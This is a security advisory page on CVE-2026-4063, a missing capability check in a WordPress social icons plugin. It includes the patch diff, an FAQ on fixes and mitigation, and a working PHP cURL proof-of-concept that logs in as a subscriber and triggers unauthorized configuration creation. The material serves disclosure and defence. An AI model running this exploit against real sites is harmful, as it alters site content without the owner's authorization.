Atomic Edge analysis of CVE-2026-4063:
The vulnerability exists in the Social Icons Widget & Block plugin for WordPress versions up to and including 4.5.8. The root cause is a missing capability check in the add_menu_item() method of the WPZOOM_Social_Sharing_Buttons class. This method is hooked to the admin_menu action and executes wp_insert_post() and update_post_meta() calls to create a wpzoom-sharing configuration post. The method does not verify the current user has administrator-level capabilities before performing these operations. The attack vector requires an authenticated user with Subscriber-level access or higher to trigger the admin_menu hook execution, which occurs when any WordPress admin page loads. When triggered, the method creates a published wpzoom-sharing configuration post with default sharing button settings. This configuration automatically activates social sharing buttons on all post content via the the_content filter. The patch adds a capability check at the beginning of the add_menu_item() method in class-wpzoom-social-sharing-buttons.php, requiring the current user to have the manage_options capability. This restricts configuration creation to administrators only. Atomic Edge research confirms exploitation causes unwanted social sharing buttons to appear on all frontend posts, potentially disrupting site appearance and user experience.
Published : March 18, 2026
CVE-2026-4063: Social Icons Widget & Block <= 4.5.8 – Missing Authorization to Authenticated (Subscriber+) Sharing Configuration Creation (social-icons-widget-by-wpzoom)
CVE ID
CVE-2026-4063
Severity
Medium
(CVSS 4.3)
CWE
862
Vulnerable Version
4.5.8
Patched Version
4.5.9
Disclosed
March 11, 2026
Analysis Overview
Differential between vulnerable and patched code
Code Diff
--- a/social-icons-widget-by-wpzoom/elementor/wpzoom-social-icons-elementor.php
+++ b/social-icons-widget-by-wpzoom/elementor/wpzoom-social-icons-elementor.php
@@ -123,6 +123,7 @@
wp_enqueue_style(
'wpzoom-social-icons-elementor',
WPZOOM_SOCIAL_ICONS_PLUGIN_URL . 'elementor/assets/css/wpzoom-social-icons-elementor.css',
+ array(),
WPZOOM_SOCIAL_ICONS_PLUGIN_VERSION
);
}
--- a/social-icons-widget-by-wpzoom/includes/classes/class-wpzoom-sharing-buttons-notice.php
+++ b/social-icons-widget-by-wpzoom/includes/classes/class-wpzoom-sharing-buttons-notice.php
@@ -2,7 +2,7 @@
/**
* Sharing Buttons Admin Notice
*
- * Displays a dismissible notice on the dashboard promoting the sharing buttons feature.
+ * Registers the sharing buttons notice with WPZOOM Notice Center when available.
*
* @package WPZOOM_Social_Icons
*/
@@ -18,75 +18,21 @@
class WPZOOM_Sharing_Buttons_Notice {
/**
- * The single class instance.
- *
- * @var $instance
- */
- private static $instance = null;
-
- /**
- * Notice dismiss key
+ * Notice ID for Notice Center
*
* @var string
*/
- private $dismiss_key = 'wpzoom_sharing_buttons_notice_dismissed';
-
- /**
- * Main Instance
- */
- public static function get_instance() {
- if ( is_null( self::$instance ) ) {
- self::$instance = new self();
- }
- return self::$instance;
- }
+ const NOTICE_ID = 'wpzoom_sharing_buttons';
/**
* Constructor.
*/
public function __construct() {
- add_action( 'admin_notices', array( $this, 'display_notice' ) );
- add_action( 'wp_ajax_wpzoom_dismiss_sharing_notice', array( $this, 'dismiss_notice' ) );
- add_action( 'admin_enqueue_scripts', array( $this, 'enqueue_scripts' ) );
+ add_filter( 'wpzoom_notice_center_notices', array( $this, 'register_notice_center' ) );
}
/**
- * Check if notice should be displayed
- *
- * @return bool
- */
- private function should_display_notice() {
- // Only show to admins.
- if ( ! current_user_can( 'manage_options' ) ) {
- return false;
- }
-
- // Check if dismissed.
- if ( get_user_meta( get_current_user_id(), $this->dismiss_key, true ) ) {
- return false;
- }
-
- // Only show on dashboard or plugin pages.
- $screen = get_current_screen();
- if ( ! $screen ) {
- return false;
- }
-
- $allowed_screens = array(
- 'dashboard',
- 'plugins',
- 'edit-wpzoom-shortcode',
- );
-
- if ( ! in_array( $screen->id, $allowed_screens, true ) ) {
- return false;
- }
-
- return true;
- }
-
- /**
- * Get the sharing config edit URL
+ * Get the sharing config edit URL.
*
* @return string|false
*/
@@ -107,158 +53,63 @@
}
/**
- * Display the admin notice
+ * Register the sharing buttons notice with WPZOOM Notice Center.
+ *
+ * @param array $notices Existing notices from the filter.
+ * @return array Notices with sharing notice added when applicable.
*/
- public function display_notice() {
- if ( ! $this->should_display_notice() ) {
- return;
+ public function register_notice_center( $notices ) {
+ if ( ! is_array( $notices ) ) {
+ $notices = array();
}
$configure_url = $this->get_sharing_config_url();
- // If no config exists yet, don't show the notice.
+ // Only show when at least one sharing config exists.
if ( ! $configure_url ) {
- return;
+ return $notices;
}
- $nonce = wp_create_nonce( 'wpzoom_dismiss_sharing_notice' );
- ?>
- <div class="notice notice-info is-dismissible wpzoom-sharing-notice" data-nonce="<?php echo esc_attr( $nonce ); ?>">
- <div class="wpzoom-sharing-notice-content">
- <div class="wpzoom-sharing-notice-icon">
- <svg width="40" height="40" viewBox="0 0 24 24" fill="#3496ff">
- <path d="M18 16.08c-.76 0-1.44.3-1.96.77L8.91 12.7c.05-.23.09-.46.09-.7s-.04-.47-.09-.7l7.05-4.11c.54.5 1.25.81 2.04.81 1.66 0 3-1.34 3-3s-1.34-3-3-3-3 1.34-3 3c0 .24.04.47.09.7L8.04 9.81C7.5 9.31 6.79 9 6 9c-1.66 0-3 1.34-3 3s1.34 3 3 3c.79 0 1.5-.31 2.04-.81l7.12 4.16c-.05.21-.08.43-.08.65 0 1.61 1.31 2.92 2.92 2.92s2.92-1.31 2.92-2.92-1.31-2.92-2.92-2.92z"/>
- </svg>
- </div>
- <div class="wpzoom-sharing-notice-text">
- <h3><?php esc_html_e( 'Add Social Sharing Buttons to Your Posts', 'social-icons-widget-by-wpzoom' ); ?></h3>
- <p><?php esc_html_e( 'Let your visitors share your content on social media! Enable sharing buttons that appear automatically on all your posts and pages.', 'social-icons-widget-by-wpzoom' ); ?></p>
- <p class="wpzoom-sharing-notice-pro-hint">
- <?php
- printf(
- /* translators: %s: upgrade link */
- esc_html__( 'Want more? %s adds AI Share Buttons, Like Button, Share Counts & Analytics.', 'social-icons-widget-by-wpzoom' ),
- '<a href="https://www.wpzoom.com/plugins/social-share/?utm_source=wpadmin&utm_medium=plugin&utm_campaign=social-icons-free&utm_content=sharing-notice" target="_blank"><strong>' . esc_html__( 'PRO', 'social-icons-widget-by-wpzoom' ) . '</strong></a>'
- );
- ?>
- </p>
- <div class="wpzoom-sharing-notice-actions">
- <a href="<?php echo esc_url( $configure_url ); ?>" class="button wpzoom-sharing-btn-primary">
- <?php esc_html_e( 'Configure Sharing Buttons', 'social-icons-widget-by-wpzoom' ); ?>
- </a>
- <a href="https://www.wpzoom.com/plugins/social-share/?utm_source=wpadmin&utm_medium=plugin&utm_campaign=social-icons-free&utm_content=sharing-notice-btn" class="button wpzoom-sharing-btn-upgrade" target="_blank">
- <span class="dashicons dashicons-star-filled" style="font-size: 16px; line-height: 28px; width: 16px; height: 16px; margin-right: 3px;"></span>
- <?php esc_html_e( 'Upgrade to Pro', 'social-icons-widget-by-wpzoom' ); ?>
- </a>
- </div>
- </div>
- </div>
- </div>
- <?php
- }
+ $pro_url = 'https://www.wpzoom.com/plugins/social-share/?utm_source=wpadmin&utm_medium=plugin&utm_campaign=social-icons-free&utm_content=sharing-notice-btn';
- /**
- * Enqueue scripts and styles for the notice
- *
- * @param string $hook Current admin page.
- */
- public function enqueue_scripts( $hook ) {
- if ( ! $this->should_display_notice() ) {
- return;
- }
+ $content = '<p>' . esc_html__( 'Let your visitors share your content on social media! Enable sharing buttons that appear automatically on all your posts and pages.', 'social-icons-widget-by-wpzoom' ) . '</p>';
+ $content .= '<p>';
+ $content .= sprintf(
+ /* translators: %s: upgrade link */
+ esc_html__( 'Want more? %s adds AI Share Buttons, Like Button, Share Counts & Analytics.', 'social-icons-widget-by-wpzoom' ),
+ '<a href="https://www.wpzoom.com/plugins/social-share/?utm_source=wpadmin&utm_medium=plugin&utm_campaign=social-icons-free&utm_content=sharing-notice" target="_blank" rel="noopener noreferrer"><strong>' . esc_html__( 'PRO', 'social-icons-widget-by-wpzoom' ) . '</strong></a>'
+ );
+ $content .= '</p>';
- wp_add_inline_style( 'common', '
- .wpzoom-sharing-notice {
- padding: 0 !important;
- border-left-color: #3496ff !important;
- }
- .wpzoom-sharing-notice-content {
- display: flex;
- align-items: center;
- padding: 15px 30px 15px 12px;
- gap: 15px;
- }
- .wpzoom-sharing-notice-icon {
- flex-shrink: 0;
- }
- .wpzoom-sharing-notice-text {
- flex: 1;
- }
- .wpzoom-sharing-notice-text h3 {
- margin: 0 0 5px 0;
- font-size: 14px;
- }
- .wpzoom-sharing-notice-text p {
- margin: 0;
- color: #50575e;
- }
- .wpzoom-sharing-notice-pro-hint {
- margin-top: 6px !important;
- font-size: 12px;
- color: #888 !important;
- }
- .wpzoom-sharing-notice-pro-hint a {
- color: #3496ff;
- text-decoration: none;
- }
- .wpzoom-sharing-notice-actions {
- display: flex;
- gap: 8px;
- margin-top: 10px;
- }
- .wpzoom-sharing-btn-primary.button {
- background: #1a1a1a !important;
- color: #fff !important;
- border-color: #1a1a1a !important;
- border-radius: 4px;
- }
- .wpzoom-sharing-btn-primary.button:hover {
- background: #3496ff !important;
- border-color: #3496ff !important;
- }
- .wpzoom-sharing-btn-upgrade.button {
- border-color: #1a1a1a !important;
- color: #1a1a1a !important;
- border-radius: 4px;
- }
- .wpzoom-sharing-btn-upgrade.button:hover {
- background: #3496ff !important;
- border-color: #3496ff !important;
- color: #fff !important;
- }
- @media (max-width: 782px) {
- .wpzoom-sharing-notice-content {
- flex-wrap: wrap;
- }
- .wpzoom-sharing-notice-actions {
- width: 100%;
- margin-top: 10px;
- }
- }
- ' );
-
- wp_add_inline_script( 'common', '
- jQuery(document).ready(function($) {
- $(".wpzoom-sharing-notice").on("click", ".notice-dismiss", function() {
- var $notice = $(this).closest(".wpzoom-sharing-notice");
- $.post(ajaxurl, {
- action: "wpzoom_dismiss_sharing_notice",
- nonce: $notice.data("nonce")
- });
- });
- });
- ' );
- }
+ $notices[] = array(
+ 'id' => self::NOTICE_ID,
+ 'heading' => __( 'Add Social Sharing Buttons to Your Posts', 'social-icons-widget-by-wpzoom' ),
+ 'content' => $content,
+ 'icon' => array(
+ 'type' => 'dashicon',
+ 'src' => '',
+ 'dashicon' => 'dashicons-share',
+ 'color' => '#3496ff',
+ 'background_color' => '',
+ ),
+ 'primary_button' => array(
+ 'label' => __( 'Configure Sharing Buttons', 'social-icons-widget-by-wpzoom' ),
+ 'url' => $configure_url,
+ 'new_tab' => false,
+ ),
+ 'secondary_button' => array(
+ 'label' => __( 'Upgrade to Pro', 'social-icons-widget-by-wpzoom' ),
+ 'url' => $pro_url,
+ 'new_tab' => true,
+ ),
+ 'capability' => 'manage_options',
+ 'screens' => array( 'dashboard', 'plugins', 'edit-wpzoom-shortcode' ),
+ 'source' => 'Social Icons & Sharing',
+ 'priority' => 15,
+ );
- /**
- * AJAX handler to dismiss notice
- */
- public function dismiss_notice() {
- check_ajax_referer( 'wpzoom_dismiss_sharing_notice', 'nonce' );
- update_user_meta( get_current_user_id(), $this->dismiss_key, true );
- wp_die();
+ return $notices;
}
}
-// Initialize the class.
-WPZOOM_Sharing_Buttons_Notice::get_instance();
+new WPZOOM_Sharing_Buttons_Notice();
--- a/social-icons-widget-by-wpzoom/includes/classes/class-wpzoom-social-sharing-buttons.php
+++ b/social-icons-widget-by-wpzoom/includes/classes/class-wpzoom-social-sharing-buttons.php
@@ -108,6 +108,11 @@
* Add menu item
*/
public function add_menu_item() {
+ // Only administrators should be able to create/manage sharing configuration.
+ if ( ! current_user_can( 'manage_options' ) ) {
+ return;
+ }
+
$parent_slug = 'edit.php?post_type=wpzoom-shortcode';
// Check if there's an existing configuration
@@ -505,4 +510,4 @@
}
// Initialize the class
-WPZOOM_Social_Sharing_Buttons::get_instance();
No newline at end of file
+WPZOOM_Social_Sharing_Buttons::get_instance();
--- a/social-icons-widget-by-wpzoom/social-icons-widget-by-wpzoom.php
+++ b/social-icons-widget-by-wpzoom/social-icons-widget-by-wpzoom.php
@@ -3,14 +3,14 @@
* Plugin Name: Social Icons & Sharing Buttons by WPZOOM
* Plugin URI: https://www.wpzoom.com/plugins/social-share/
* Description: Add Social Icons and Share Buttons to your website easily. Link to your social media profiles or let visitors share your content on popular networks. Supports over 400 social media icons, customizable colors, and drag-and-drop sorting.
- * Version: 4.5.8
+ * Version: 4.5.9
* Author: WPZOOM
* Author URI: https://www.wpzoom.com/
* Text Domain: social-icons-widget-by-wpzoom
* License: GNU General Public License v2.0 or later
* License URI: http://www.gnu.org/licenses/gpl-2.0.txt
* Requires at least: 6.5
- * Tested up to: 6.9
+ * Tested up to: 7.0
*
* @package WPZOOM_Social_Icons
*/
@@ -45,6 +45,18 @@
require_once plugin_dir_path( __FILE__ ) . 'includes/classes/class-wpzoom-social-icons-shortcode.php';
require_once plugin_dir_path( __FILE__ ) . 'includes/classes/class-wpzoom-share-analytics-upsell.php';
require_once plugin_dir_path( __FILE__ ) . 'includes/classes/class-wpzoom-floating-buttons-upsell.php';
+
+// WPZOOM Notice Center (submodule at includes/notice-center).
+$wpz_notice_center_path = WPZOOM_SOCIAL_ICONS_PLUGIN_PATH . 'includes/notice-center/';
+$wpz_notice_center_url = WPZOOM_SOCIAL_ICONS_PLUGIN_URL . 'includes/notice-center/';
+if ( is_admin() && ! class_exists( 'WPZOOM_Notice_Center' ) && file_exists( $wpz_notice_center_path . 'notice-center.php' ) ) {
+ require_once $wpz_notice_center_path . 'notice-center.php';
+ WPZOOM_Notice_Center::get_instance()->set_assets( array(
+ 'css_url' => $wpz_notice_center_url . 'assets/notice-center.css',
+ 'js_url' => $wpz_notice_center_url . 'assets/notice-center.js',
+ ) );
+}
+
require_once plugin_dir_path( __FILE__ ) . 'includes/classes/class-wpzoom-sharing-buttons-notice.php';
require_once plugin_dir_path( __FILE__ ) . 'includes/classes/class-wpzoom-social-icons-upsell.php';
Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-4063 - Social Icons Widget & Block <= 4.5.8 - Missing Authorization to Authenticated (Subscriber+) Sharing Configuration Creation
<?php
// Configure target WordPress site
$target_url = 'http://target-wordpress-site.com';
$username = 'subscriber';
$password = 'password';
// Step 1: Authenticate as subscriber
$login_url = $target_url . '/wp-login.php';
$admin_url = $target_url . '/wp-admin/';
// Create cURL session for login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// Get login page to obtain nonce
$response = curl_exec($ch);
preg_match('/name="log"[^>]+value="([^"]*)"/', $response, $log_matches);
preg_match('/name="pwd"[^>]+value="([^"]*)"/', $response, $pwd_matches);
preg_match('/name="wp-submit"[^>]+value="([^"]*)"/', $response, $submit_matches);
// Prepare POST data for login
$post_fields = [
'log' => $username,
'pwd' => $password,
'wp-submit' => $submit_matches[1] ?? 'Log In',
'redirect_to' => $admin_url,
'testcookie' => '1'
];
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
// Execute login
$response = curl_exec($ch);
// Step 2: Trigger admin_menu hook execution by accessing any admin page
// The add_menu_item() method will execute and create the sharing configuration
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);
// Check if configuration was created
if (strpos($response, 'wpzoom-sharing') !== false || strpos($response, 'sharing') !== false) {
echo "Success: Sharing configuration likely created. Social buttons will appear on all posts.n";
} else {
echo "Configuration may have been created. Verify by checking frontend posts for social sharing buttons.n";
}
curl_close($ch);
unlink('cookies.txt');
?>Frequently Asked Questions
What is CVE-2026-4063?
Overview of the vulnerabilityCVE-2026-4063 is a medium-severity vulnerability in the Social Icons Widget & Block plugin for WordPress, specifically in versions up to and including 4.5.8. It allows authenticated users with Subscriber-level access or higher to create unauthorized sharing configurations, which can lead to unwanted social sharing buttons being injected into all post content.
How does CVE-2026-4063 work?
Mechanism of exploitationThe vulnerability arises from a missing capability check in the add_menu_item() method of the plugin. This method allows users to trigger the creation of a wpzoom-sharing configuration post without verifying if the user has administrator-level capabilities, enabling unauthorized modifications.
Who is affected by this vulnerability?
Identifying vulnerable users and systemsAny WordPress site using the Social Icons Widget & Block plugin version 4.5.8 or earlier is affected. Specifically, authenticated users with Subscriber-level access and above can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to identify vulnerabilityTo check if your site is vulnerable, verify the version of the Social Icons Widget & Block plugin installed. If it is version 4.5.8 or earlier, your site is at risk. Additionally, review user roles to see if any authenticated users have Subscriber-level access.
How can I fix CVE-2026-4063?
Updating the pluginThe vulnerability is patched in version 4.5.9 of the Social Icons Widget & Block plugin. Updating to this version will resolve the issue by adding necessary capability checks to restrict configuration creation to administrators only.
What if I cannot update the plugin immediately?
Mitigation strategiesIf an immediate update is not possible, consider temporarily disabling the plugin to prevent exploitation. Additionally, review user roles and permissions to limit access to only trusted users until the plugin can be updated.
What does a CVSS score of 4.3 mean?
Understanding severity ratingsA CVSS score of 4.3 indicates a medium severity vulnerability. This means that while it is not critical, it poses a significant risk that could lead to unauthorized actions on the site, especially if exploited by authenticated users.
What practical risks does this vulnerability pose?
Impact on site functionalityExploitation of this vulnerability can lead to unwanted social sharing buttons being added to all posts, which may disrupt the site’s appearance and user experience. This could affect user engagement and the overall aesthetic of the site.
How does the proof of concept demonstrate the issue?
Understanding the exploitThe proof of concept provided illustrates how an authenticated user can log in and trigger the creation of a sharing configuration post without proper authorization checks. This demonstrates the ease with which the vulnerability can be exploited.
What are the implications of unauthorized data modification?
Consequences of exploitationUnauthorized data modification can lead to a range of issues, including the injection of unwanted content, potential data integrity problems, and a negative impact on user trust. It can also create additional vulnerabilities if exploited further.
Is there a way to monitor for exploitation attempts?
Detecting potential attacksTo monitor for exploitation attempts, consider implementing security plugins that log user actions and changes made to posts. Regularly reviewing logs can help identify unauthorized access or changes.
What should I do if I suspect my site has been compromised?
Response to potential breachesIf you suspect your site has been compromised, immediately change passwords for all user accounts, review user roles, and check for any unauthorized changes or content. It is also advisable to conduct a full security audit and consider restoring from a backup.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
